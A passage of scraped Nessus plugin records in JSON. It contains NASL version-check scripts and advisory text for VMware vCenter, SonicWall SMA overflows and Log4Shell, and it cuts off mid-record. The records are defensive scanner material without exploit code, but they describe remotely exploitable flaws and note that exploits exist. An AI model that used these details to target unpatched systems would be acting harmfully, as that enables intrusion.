script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nport = get_kb_item_or_exit('Host/VMware/vCenter');\nversion = get_kb_item_or_exit('Host/VMware/version');\nrelease = get_kb_item_or_exit('Host/VMware/release');\n\n# Extract and verify the build number\nbuild = ereg_replace(pattern:'^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$', string:release, replace:\"\\1\");\nif (build !~ '^[0-9]+$') exit(1, 'Failed to extract the build number from the release string.');\n\nrelease = release - 'VMware vCenter Server ';\nfixversion = NULL;\n\n# Check version and build numbers\n# 6.7 U3 https://docs.vmware.com/en/VMware-vSphere/6.7/rn/vsphere-vcenter-server-67u3f-release-notes.html\nif(version =~ '^VMWare vCenter 6\\\\.7$' && int(build) < 15976714) fixversion = '6.7.0 build-15976714';\nelse audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nreport = report_items_str(\n report_items:make_array(\n 'Installed version', release,\n 'Fixed version', fixversion\n ),\n ordered_fields:make_list('Installed version', 'Fixed version')\n);\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-06T16:25:41", "description": "According to its self-reported version, the remote SonicWall Secure Mobile Access is affected by multiple vulnerabilities, including:\n\n - An unauthenticated stack-based buffer overflow due to the SonicWall SMA SSLVPN Apache httpd server GET method of mod_cgi module environment variables use a single stack-based buffer using `strcat`. This can allow a remote, unauthenticated attacker to execute arbitrary code. (CVE-2021-20038)\n\n - Multiple unauthenticated file explorer heap-based and stack-based buffer overflows due the sonicfiles RAC_COPY_TO (RacNumber 36) method which allows users to upload files to an SMB share and can be called without any authentication. This can allow a remote, unauthenticated attacker to execute arbitrary code as the nobody user.\n (CVE-2021-20045)\n\n - A heap-based buffer overflow due to the RAC_GET_BOOKMARKS_HTML5 (RacNumber 35) method that allows users to list their bookmarks. This method is vulnerable to heap-based buffer-overflow, due to unchecked use of strcat. This can allow a remote, authenticated attacker to execute arbitrary code as the nobody user. (CVE-2021-20043)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-09T00:00:00", "type": "nessus", "title": "SonicWall Secure Mobile Access Multiple Vulnerabilities (SNWLID-2021-0026)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039", "CVE-2021-20040", "CVE-2021-20041", "CVE-2021-20042", "CVE-2021-20043", "CVE-2021-20044", "CVE-2021-20045"], "modified": "2022-05-06T00:00:00", "cpe": ["cpe:/o:sonicwall:sma_100_firmware"], "id": "SONICWALL_SMA_SNWLID-2021-0026.NASL", "href": "https://www.tenable.com/plugins/nessus/155961", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155961);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\n \"CVE-2021-20038\",\n \"CVE-2021-20039\",\n \"CVE-2021-20040\",\n \"CVE-2021-20041\",\n \"CVE-2021-20042\",\n \"CVE-2021-20043\",\n \"CVE-2021-20044\",\n \"CVE-2021-20045\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0572\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/11\");\n\n script_name(english:\"SonicWall Secure Mobile Access Multiple Vulnerabilities (SNWLID-2021-0026)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote SonicWall Secure Mobile Access is affected by multiple\nvulnerabilities, including:\n\n - An unauthenticated stack-based buffer overflow due to the SonicWall SMA SSLVPN Apache httpd server GET method of\n mod_cgi module environment variables use a single stack-based buffer using `strcat`. This can allow a remote,\n unauthenticated attacker to execute arbitrary code. (CVE-2021-20038)\n\n - Multiple unauthenticated file explorer heap-based and stack-based buffer overflows due the sonicfiles RAC_COPY_TO\n (RacNumber 36) method which allows users to upload files to an SMB share and can be called without any\n authentication. This can allow a remote, unauthenticated attacker to execute arbitrary code as the nobody user.\n (CVE-2021-20045)\n\n - A heap-based buffer overflow due to the RAC_GET_BOOKMARKS_HTML5 (RacNumber 35) method that allows users to list\n their bookmarks. This method is vulnerable to heap-based buffer-overflow, due to unchecked use of strcat. This can\n allow a remote, authenticated attacker to execute arbitrary code as the nobody user. (CVE-2021-20043)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e1e1dbee\");\n # https://www.sonicwall.com/support/product-notification/product-security-notice-sma-100-series-vulnerability-patches-q4-2021/211201154715443/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01c34e29\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 10.2.0.9-41sv or 10.2.1.3-27sv or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20044\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-20045\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SonicWall SMA 100 Series Authenticated Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sonicwall:sma_100_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sonicwall_sma_web_detect.nbin\");\n script_require_keys(\"installed_sw/SonicWall Secure Mobile Access\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app_name = 'SonicWall Secure Mobile Access';\nvar port = get_http_port(default:443,embedded:TRUE);\nvar app = vcf::get_app_info(app:app_name, webapp:TRUE, port:port);\n\nif (app['Model'] !~ \"SMA (200|210|400|410|500v)\")\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, port);\n\nvar constraints =\n[\n {'min_version' : '9.0.0.0.0', 'max_version': '9.0.0.11.31', 'fixed_version' : '10.2.0.9.41', 'fixed_display':'Upgrade to version 10.2.0.9-41sv or later.'},\n {'min_version' : '10.2.0.0.0', 'max_version': '10.2.0.8.37', 'fixed_version' : '10.2.0.9.41', 'fixed_display':'Upgrade to version 10.2.0.9-41sv or later.'},\n {'min_version' : '10.2.1.0.0', 'max_version': '10.2.1.1.19', 'fixed_version' : '10.2.1.3.27', 'fixed_display':'Upgrade to version 10.2.1.3-27sv or later.'},\n {'min_version' : '10.2.1.2.0', 'max_version': '10.2.1.2.24', 'fixed_version' : '10.2.1.3.27', 'fixed_display':'Upgrade to version 10.2.1.3-27sv or later.'}\n];\n\nvcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-03T02:29:58", "description": "A remote code execution vulnerability exists in VMWare vCenter in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request, to execute arbitrary code with the permission level of the running Java process.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-02T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156035", "sourceData": "Binary data vmware_vcenter_log4shell.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T23:37:15", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:graylog", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "href": "https://www.tenable.com/plugins/nessus/156021", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156021);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/18\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacke
Metasploit Weekly Wrap-Up
